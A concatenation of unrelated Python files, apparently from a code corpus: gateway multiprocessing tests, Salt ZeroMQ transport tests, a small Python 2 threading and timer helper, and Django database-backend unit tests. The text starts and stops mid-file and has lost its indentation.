for cp in client_processes:
assert cp.exitcode == 0
def test_grpc_gateway_runtime_lazy_request_access(linear_graph_dict, monkeypatch):
call_counts = multiprocessing.Queue()
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyNoDocAccessMockConnectionPool.send_requests_once,
)
port = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port, 'grpc')
assert len(responses) > 0
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': 'grpc',
'port': port,
'graph_dict': linear_graph_dict,
'call_counts': call_counts,
'monkeypatch': monkeypatch,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
assert (
_queue_length(call_counts) == NUM_PARALLEL_CLIENTS * 2
) # request should be decompressed at start and end only
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_bifurcation(
bifurcation_graph_dict, monkeypatch, protocol
):
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port, protocol)
assert len(responses) > 0
# reducing is supposed to happen in the deployments; in this test the gateway gets back a single doc in non-deterministic order
assert len(responses[0].docs) == 1
assert (
responses[0].docs[0].text
== f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment2-client{client_id}-deployment3'
or responses[0].docs[0].text
== f'client{client_id}-Request-client{client_id}-deployment4-client{client_id}-deployment5'
)
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': bifurcation_graph_dict,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_merge_in_gateway(
merge_graph_dict_directly_merge_in_gateway, monkeypatch, protocol
):
# TODO: Test incomplete until merging of responses is ready
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
deployment1_path = (
f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment1-client{client_id}-merger'
in responses[0].docs[0].text
)
deployment2_path = (
f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment2-client{client_id}-merger'
in responses[0].docs[0].text
)
assert deployment1_path or deployment2_path
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': merge_graph_dict_directly_merge_in_gateway,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_merge_in_last_deployment(
merge_graph_dict_directly_merge_in_last_deployment, monkeypatch, protocol
):
# TODO: Test incomplete until merging of responses is ready
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
deployment1_path = (
f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment1-client{client_id}-merger-client{client_id}-deployment_last'
in responses[0].docs[0].text
)
deployment2_path = (
f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment2-client{client_id}-merger-client{client_id}-deployment_last'
in responses[0].docs[0].text
)
assert deployment1_path or deployment2_path
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': merge_graph_dict_directly_merge_in_last_deployment,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_complete_graph_dict(
complete_graph_dict, monkeypatch, protocol
):
# TODO: Test incomplete until merging of responses is ready
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
# there are 3 incoming paths to merger, it could be any
assert (
f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment1-client{client_id}-merger-client{client_id}-deployment_last'
== responses[0].docs[0].text
or f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment2-client{client_id}-deployment3-client{client_id}-merger-client{client_id}-deployment_last'
== responses[0].docs[0].text
or f'client{client_id}-Request-client{client_id}-deployment4-client{client_id}-deployment5-client{client_id}-merger-client{client_id}-deployment_last'
== responses[0].docs[0].text
)
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': complete_graph_dict,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
def _queue_length(queue: 'multiprocessing.Queue'):
# Pops elements from the queue and counts them
# Used if the underlying queue is sensitive to ordering
# This is used instead of multiprocessing.Queue.qsize() since it is not supported on MacOS
length = 0
while not queue.empty():
queue.get()
length += 1
return length
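# A typical way to run this module (assuming pytest is installed):
#   pytest test_clients_gateways.py -k "linear"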
|
test_zeromq.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Thomas Jackson <jacksontj.89@gmail.com>`
'''
# Import python libs
from __future__ import absolute_import
import os
import time
import threading
# linux_distribution deprecated in py3.7
try:
from platform import linux_distribution
except ImportError:
from distro import linux_distribution
# Import 3rd-party libs
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
from tornado.testing import AsyncTestCase
import tornado.gen
# Import Salt libs
import salt.config
from salt.ext import six
import salt.utils.process
import salt.transport.server
import salt.transport.client
import salt.exceptions
from salt.ext.six.moves import range
from salt.transport.zeromq import AsyncReqMessageClientPool
# Import test support libs
from tests.support.paths import TMP_CONF_DIR
from tests.support.unit import TestCase, skipIf
from tests.support.helpers import flaky, get_unused_localhost_port
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, patch
from tests.unit.transport.mixins import PubChannelMixin, ReqChannelMixin
ON_SUSE = False
if 'SuSE' in linux_distribution(full_distribution_name=False):
ON_SUSE = True
class BaseZMQReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
'''
Test the req server/client pair
'''
@classmethod
def setUpClass(cls):
if not hasattr(cls, '_handle_payload'):
return
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
'master',
**{'transport': 'zeromq',
'auto_accept': True,
'ret_port': ret_port,
'publish_port': publish_port,
'tcp_master_pub_port': tcp_master_pub_port,
'tcp_master_pull_port': tcp_master_pull_port,
'tcp_master_publish_pull': tcp_master_publish_pull,
'tcp_master_workers': tcp_master_workers}
)
cls.minion_config = cls.get_temp_config(
'minion',
**{'transport': 'zeromq',
'master_ip': '127.0.0.1',
'master_port': ret_port,
'auth_timeout': 5,
'auth_tries': 1,
'master_uri': 'tcp://127.0.0.1:{0}'.format(ret_port)}
)
cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
cls.server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_config)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
cls.io_loop.make_current()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(target=cls.io_loop.start)
cls.server_thread.daemon = True
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
if not hasattr(cls, '_handle_payload'):
return
# Attempting to kill the children hangs the test suite.
# Let the test suite handle this instead.
cls.process_manager.stop_restarting()
cls.process_manager.kill_children()
cls.io_loop.add_callback(cls.io_loop.stop)
cls.server_thread.join()
time.sleep(2) # Give the procs a chance to fully close before we stop the io_loop
cls.server_channel.close()
del cls.server_channel
del cls.io_loop
del cls.process_manager
del cls.server_thread
del cls.master_config
del cls.minion_config
@classmethod
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
return payload, {'fun': 'send_clear'}
class ClearReqTestCases(BaseZMQReqCase, ReqChannelMixin):
'''
Test all of the clear msg stuff
'''
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config, crypt='clear')
def tearDown(self):
del self.channel
@classmethod
@tornado.gen.coroutine
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
raise tornado.gen.Return((payload, {'fun': 'send_clear'}))
@flaky
@skipIf(ON_SUSE, 'Skipping until https://github.com/saltstack/salt/issues/32902 gets fixed')
class AESReqTestCases(BaseZMQReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)
def tearDown(self):
del self.channel
@classmethod
@tornado.gen.coroutine
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
raise tornado.gen.Return((payload, {'fun': 'send'}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
#
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#
# WARNING: This test will fail randomly on any system with > 1 CPU core!!!
#
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
def test_badload(self):
'''
Test a variety of bad requests, make sure that we get some sort of error
'''
# TODO: This test should be re-enabled when Jenkins moves to C7.
# Once the version of salt-testing is increased to something newer than the September
# release of salt-testing, the @flaky decorator should be applied to this test.
msgs = ['', [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg, timeout=5)
class BaseZMQPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
'''
Test the req server/client pair
'''
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
'master',
**{'transport': 'zeromq',
'auto_accept': True,
'ret_port': ret_port,
'publish_port': publish_port,
'tcp_master_pub_port': tcp_master_pub_port,
'tcp_master_pull_port': tcp_master_pull_port,
'tcp_master_publish_pull': tcp_master_publish_pull,
'tcp_master_workers': tcp_master_workers}
)
cls.minion_config = salt.config.minion_config(os.path.join(TMP_CONF_DIR, 'minion'))
cls.minion_config = cls.get_temp_config(
'minion',
**{'transport': 'zeromq',
'master_ip': '127.0.0.1',
'master_port': ret_port,
'master_uri': 'tcp://127.0.0.1:{0}'.format(ret_port)}
)
cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
cls.server_channel = salt.transport.server.PubServerChannel.factory(cls.master_config)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_config)
cls.req_server_channel.pre_fork(cls.process_manager)
cls._server_io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls._server_io_loop)
cls.server_thread = threading.Thread(target=cls._server_io_loop.start)
cls.server_thread.daemon = True
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.process_manager.kill_children()
cls.process_manager.stop_restarting()
time.sleep(2) # Give the procs a chance to fully close before we stop the io_loop
        cls._server_io_loop.add_callback(cls._server_io_loop.stop)
cls.server_thread.join()
cls.req_server_channel.close()
cls.server_channel.close()
cls._server_io_loop.stop()
del cls.server_channel
del cls._server_io_loop
del cls.process_manager
del cls.server_thread
del cls.master_config
del cls.minion_config
@classmethod
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
return payload, {'fun': 'send_clear'}
def setUp(self):
super(BaseZMQPubCase, self).setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super(BaseZMQPubCase, self).tearDown()
failures = []
for k, v in six.iteritems(self.io_loop._handlers):
if self._start_handlers.get(k) != v:
failures.append((k, v))
del self._start_handlers
if len(failures) > 0:
raise Exception('FDs still attached to the IOLoop: {0}'.format(failures))
@skipIf(True, 'Skip until we can devote time to fix this test')
class AsyncPubChannelTest(BaseZMQPubCase, PubChannelMixin):
'''
Tests around the publish system
'''
def get_new_ioloop(self):
return zmq.eventloop.ioloop.ZMQIOLoop()
class AsyncReqMessageClientPoolTest(TestCase):
def setUp(self):
super(AsyncReqMessageClientPoolTest, self).setUp()
sock_pool_size = 5
with patch('salt.transport.zeromq.AsyncReqMessageClient.__init__', MagicMock(return_value=None)):
self.message_client_pool = AsyncReqMessageClientPool({'sock_pool_size': sock_pool_size},
args=({}, ''))
self.original_message_clients = self.message_client_pool.message_clients
self.message_client_pool.message_clients = [MagicMock() for _ in range(sock_pool_size)]
def tearDown(self):
with patch('salt.transport.zeromq.AsyncReqMessageClient.destroy', MagicMock(return_value=None)):
del self.original_message_clients
super(AsyncReqMessageClientPoolTest, self).tearDown()
def test_send(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock.send.return_value = []
self.assertEqual([], self.message_client_pool.send())
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2].send.return_value = [1]
self.assertEqual([1], self.message_client_pool.send())
def test_destroy(self):
self.message_client_pool.destroy()
self.assertEqual([], self.message_client_pool.message_clients)
|
zoomJob.py
|
#_*_ coding: utf8 _*_
import sqlite3,os
import zoom
from threading import Thread
from functools import wraps
from time import sleep
__doc__=u'''
zoomJob.py implements simple task scheduling helpers.
Requires Python 2.7 or later.
No third-party modules are required.
'''
def asy(func):
    u'''
    Decorator that makes a function asynchronous.
    The decorated function runs in its own thread, so it can execute asynchronously.
    Example:
    >>> @asy
    ... def loop1():
    ...     while True:
    ...         time.sleep(1)
    ...         print 'loop1'
    ... def loop2():
    ...     while True:
    ...         time.sleep(1)
    ...         print 'loop2'
    ... loop1()
    ... loop2()
    loop1
    loop2
    loop2
    loop1
    ...
    '''
@wraps(func)
def wrapper(*args,**kwargs):
t=Thread(target=func,args=args,kwargs=kwargs)
t.start()
return t
return wrapper
def timer(second=1,minute=0,hour=0,day=0):
    u'''
    Decorator factory that runs the decorated function periodically, at an interval given by the second/minute/hour/day arguments.
    Example:
    >>> from zoom import *
    ... from zoomJob import *
    ... @timer()
    ... def job():
    ...     print "This is a job"
    ... job()
    This is a job
    This is a job
    ...
    '''
time=second*1+minute*60+hour*3600+day*3600*24
def real_wrapper(func):
@wraps(func)
@asy
def wrapper(*args,**kwargs):
while(True):
sleep(time)
func(*args,**kwargs)
return wrapper
return real_wrapper
if __name__=='__main__':
import time
@asy
def loop1():
while True:
time.sleep(1)
print 'loop1'
def loop2():
while True:
time.sleep(1)
print 'loop2'
loop1()
loop2()
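    # A minimal sketch of the timer() decorator (not executed here, because the
    # call to loop2() above never returns). timer is a decorator factory and
    # must be called; 'heartbeat' and 'tick' below are illustrative names only:
    #
    #   @timer(second=2)
    #   def heartbeat():
    #       print 'tick'
    #
    #   heartbeat()  # starts a background thread that prints 'tick' every 2 seconds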
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import copy
import datetime
import re
import threading
import unittest
import warnings
from decimal import Decimal, Rounded
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (
DEFAULT_DB_ALIAS, DatabaseError, IntegrityError, connection, connections,
reset_queries, transaction,
)
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.backends.signals import connection_created
from django.db.backends.utils import CursorWrapper, format_number
from django.db.models import Avg, StdDev, Sum, Variance
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (
TestCase, TransactionTestCase, mock, override_settings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.utils import ignore_warnings, str_prefix
from django.utils import six
from django.utils.deprecation import RemovedInDjango19Warning
from django.utils.six.moves import range
from . import models
class DummyBackendTest(TestCase):
def test_no_databases(self):
"""
        Test that an empty DATABASES setting defaults to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
with self.assertRaises(ImproperlyConfigured):
conns[DEFAULT_DB_ALIAS].ensure_connection()
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in range(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(models.Square)
statements = editor.collected_sql
match = re.search('"id" ([^,]+),', statements[0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate,
**{'complex': aggregate('last_modified') + aggregate('last_modified')})
def test_memory_db_test_name(self):
"""
A named in-memory db should be allowed where supported.
"""
from django.db.backends.sqlite3.base import DatabaseWrapper
settings_dict = {
'TEST': {
'NAME': 'file:memorydb_test?mode=memory&cache=shared',
}
}
wrapper = DatabaseWrapper(settings_dict)
creation = wrapper.creation
if creation.connection.features.can_share_in_memory_db:
expected = creation.connection.settings_dict['TEST']['NAME']
self.assertEqual(creation._get_test_db_name(), expected)
else:
msg = (
"Using a shared memory database with `mode=memory` in the "
"database name is not supported in your environment, "
"use `:memory:` instead."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
creation._get_test_db_name()
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses("PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 90301)
def test_nodb_connection(self):
"""
        Test that the _nodb_connection property falls back to the default connection
database when access to the 'postgres' database is not granted.
"""
def mocked_connect(self):
if self.settings_dict['NAME'] is None:
raise DatabaseError()
return ''
nodb_conn = connection._nodb_connection
self.assertIsNone(nodb_conn.settings_dict['NAME'])
# Now assume the 'postgres' db isn't available
del connection._nodb_connection
with warnings.catch_warnings(record=True) as w:
with mock.patch('django.db.backends.base.base.BaseDatabaseWrapper.connect',
side_effect=mocked_connect, autospec=True):
nodb_conn = connection._nodb_connection
del connection._nodb_connection
self.assertIsNotNone(nodb_conn.settings_dict['NAME'])
self.assertEqual(nodb_conn.settings_dict['NAME'], settings.DATABASES[DEFAULT_DB_ALIAS]['NAME'])
        # Check that a RuntimeWarning has been emitted
self.assertEqual(len(w), 1)
self.assertEqual(w[0].message.__class__, RuntimeWarning)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
databases = copy.deepcopy(settings.DATABASES)
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['AUTOCOMMIT'] = False
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def test_connect_isolation_level(self):
"""
Regression test for #18130 and #24318.
"""
from psycopg2.extensions import (
ISOLATION_LEVEL_READ_COMMITTED as read_committed,
ISOLATION_LEVEL_SERIALIZABLE as serializable,
)
# Since this is a django.test.TestCase, a transaction is in progress
# and the isolation level isn't reported as 0. This test assumes that
# PostgreSQL is configured with the default isolation level.
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(connection.connection.isolation_level, read_committed)
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['OPTIONS']['isolation_level'] = serializable
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Start a transaction so the isolation level isn't reported as 0.
new_connection.set_autocommit(False)
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(new_connection.connection.isolation_level, serializable)
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
def test_correct_extraction_psycopg2_version(self):
from django.db.backends.postgresql_psycopg2.base import psycopg2_version
version_path = 'django.db.backends.postgresql_psycopg2.base.Database.__version__'
with mock.patch(version_path, '2.6.9'):
self.assertEqual(psycopg2_version(), (2, 6, 9))
with mock.patch(version_path, '2.5.dev0'):
self.assertEqual(psycopg2_version(), (2, 5))
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
        Test the custom ``django_date_trunc`` method, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
        Test the custom ``django_date_extract`` method, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
try:
connection.ops.last_executed_query(cursor, '', ())
except Exception:
self.fail("'last_executed_query' should not raise an exception.")
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
        Test that last_executed_query() returns a Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following tests would be a good test to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TransactionTestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
